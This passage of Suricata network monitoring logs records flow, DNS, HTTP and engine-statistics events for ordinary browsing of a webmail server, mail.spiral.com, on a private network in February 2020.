{"timestamp":"2020-02-29T00:05:00.000493+0000","flow_id":1754728927280743,"event_type":"flow","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:03:47.409191+0000","end":"2020-02-29T00:03:59.345249+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:01.000179+0000","event_type":"stats","stats":{"uptime":13953,"capture":{"kernel_packets":133316,"kernel_drops":0},"decoder":{"pkts":133318,"bytes":92322961,"invalid":181,"ipv4":131877,"ipv6":8,"ethernet":133318,"raw":0,"null":0,"sll":0,"tcp":126802,"udp":4880,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2696,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2712,"synack":2703,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1739,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2224,"failed_udp":110},"tx":{"http":4514,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2301}},"flow_mgr":{"closed_pruned":2677,"new_pruned":15,"est_pruned":2262,"bypas
sed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23478,"memcap_state":0,"memcap_global":0},"http":{"memuse":125401,"memcap":0}}} {"timestamp":"2020-02-29T00:05:02.000756+0000","flow_id":387009461891405,"event_type":"flow","src_ip":"192.168.10.122","src_port":46406,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:00.930125+0000","end":"2020-02-29T00:00:01.041456+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:03.000230+0000","flow_id":1136275096733977,"event_type":"flow","src_ip":"192.168.10.122","src_port":35290,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:02.592153+0000","end":"2020-02-29T00:00:02.697211+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:03.919178+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7683},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":41495,"tx_id":0}} 
{"timestamp":"2020-02-29T00:05:03.934083+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54065,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44365,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:04.042931+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54065,"proto":"UDP","dns":{"type":"answer","id":44365,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:04.042931+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54065,"proto":"UDP","dns":{"type":"answer","id":44365,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:04.149827+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5174}} {"timestamp":"2020-02-29T00:05:04.179927+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5174},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":24573,"tx_id":1}} {"timestamp":"2020-02-29T00:05:04.194971+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":704}} {"timestamp":"2020-02-29T00:05:04.196998+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":704},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2070,"tx_id":2}} {"timestamp":"2020-02-29T00:05:04.222557+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/list.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":611}} {"timestamp":"2020-02-29T00:05:04.225081+0000","flow_id":1750343770728430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:05:04.223946+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/list.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":611},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/js\/list.js","state":"CLOSED","stored":false,"size":1658,"tx_id":3}} {"timestamp":"2020-02-29T00:05:04.224524+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/mnemo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":397}} {"timestamp":"2020-02-29T00:05:04.225825+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/mnemo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":397},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/mnemo.png","state":"CLOSED","stored":false,"size":397,"tx_id":4}} {"timestamp":"2020-02-29T00:05:04.269330+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-000.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":240}} {"timestamp":"2020-02-29T00:05:04.306330+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-000.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":240},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-000.png","state":"CLOSED","stored":false,"size":240,"tx_id":5}} {"timestamp":"2020-02-29T00:05:04.306764+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:05:05.001844+0000","flow_id":1193329442411942,"event_type":"flow","src_ip":"192.168.10.122","src_port":35660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:03.906662+0000","end":"2020-02-29T00:00:04.012140+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:06.000219+0000","flow_id":290368418484945,"event_type":"flow","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1083,"bytes_toclient":709,"start":"2020-02-29T00:04:00.070353+0000","end":"2020-02-29T00:04:05.216909+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:05:07.000500+0000","flow_id":223959634101441,"event_type":"flow","src_ip":"192.168.10.130","src_port":34724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1291,"bytes_toclient":7935,"start":"2020-02-29T00:03:59.345281+0000","end":"2020-02-29T00:04:06.663673+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:07.362761+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37139,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64893,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:07.471041+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37139,"proto":"UDP","dns":{"type":"answer","id":64893,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:07.471041+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37139,"proto":"UDP","dns":{"type":"answer","id":64893,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:07.707629+0000","flow_id":579007405056244,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6129}} {"timestamp":"2020-02-29T00:05:08.000161+0000","event_type":"stats","stats":{"uptime":13960,"capture":{"kernel_packets":133341,"kernel_drops":0},"decoder":{"pkts":133370,"bytes":92349561,"invalid":181,"ipv4":131929,"ipv6":8,"ethernet":133370,"raw":0,"null":0,"sll":0,"tcp":126850,"udp":4884,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2698,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2714,"synack":2705,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1741,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2226,"failed_udp":110},"tx":{"http":4522,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2303}},"flow_mgr":{"closed_pruned":2679,"new_pruned":15,"est_pruned":2266,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23147,"memcap_state":0,"memcap_global":0},"http":{"memuse":160851,"memcap":0}}} 
{"timestamp":"2020-02-29T00:05:09.227475+0000","flow_id":1750343770728430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":0}} {"timestamp":"2020-02-29T00:05:09.311665+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":6}} {"timestamp":"2020-02-29T00:05:10.000306+0000","flow_id":1310461790902159,"event_type":"flow","src_ip":"192.168.10.122","src_port":44297,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:09.579471+0000","end":"2020-02-29T00:00:09.690288+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:05:12.708607+0000","flow_id":579007405056244,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6129},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30702,"tx_id":0}} {"timestamp":"2020-02-29T00:05:13.000243+0000","flow_id":2128300873612889,"event_type":"flow","src_ip":"192.168.10.122","src_port":33617,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:11.917081+0000","end":"2020-02-29T00:00:12.027870+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:13.280490+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46499,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":34980,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:13.388520+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46499,"proto":"UDP","dns":{"type":"answer","id":34980,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:05:13.388520+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46499,"proto":"UDP","dns":{"type":"answer","id":34980,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:13.456437+0000","flow_id":342874398464368,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3339}} {"timestamp":"2020-02-29T00:05:15.000206+0000","event_type":"stats","stats":{"uptime":13967,"capture":{"kernel_packets":133393,"kernel_drops":0},"decoder":{"pkts":133399,"bytes":92358527,"invalid":181,"ipv4":131956,"ipv6":8,"ethernet":133399,"raw":0,"null":0,"sll":0,"tcp":126875,"udp":4886,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2699,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2715,"synack":2706,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":17
42,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2227,"failed_udp":110},"tx":{"http":4523,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2304}},"flow_mgr":{"closed_pruned":2680,"new_pruned":15,"est_pruned":2267,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22818,"memcap_state":0,"memcap_global":0},"http":{"memuse":74797,"memcap":0}}} {"timestamp":"2020-02-29T00:05:17.000247+0000","flow_id":859219642302663,"event_type":"flow","src_ip":"192.168.10.122","src_port":44592,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:16.606407+0000","end":"2020-02-29T00:00:16.717444+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:18.000715+0000","flow_id":1375826898671631,"event_type":"flow","src_ip":"192.168.10.122","src_port":34211,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:17.808975+0000","end":"2020-02-29T00:00:17.914037+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:18.458620+0000","flow_id":342874398464368,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34740,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3339},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":16766,"tx_id":0}} {"timestamp":"2020-02-29T00:05:22.000735+0000","event_type":"stats","stats":{"uptime":13974,"capture":{"kernel_packets":133419,"kernel_drops":0},"decoder":{"pkts":133419,"bytes":92364099,"invalid":181,"ipv4":131974,"ipv6":8,"ethernet":133419,"raw":0,"null":0,"sll":0,"tcp":126891,"udp":4888,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2700,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2716,"synack":2707,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1743,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2228,"failed_udp":110},"tx":{"http":4524,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2305}},"flow_mgr":{"closed_pruned":2680,"new_pruned":15,"est_pruned":2270,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22157,"memcap_state":0,"memcap_global":0},"http":{"memuse":39940
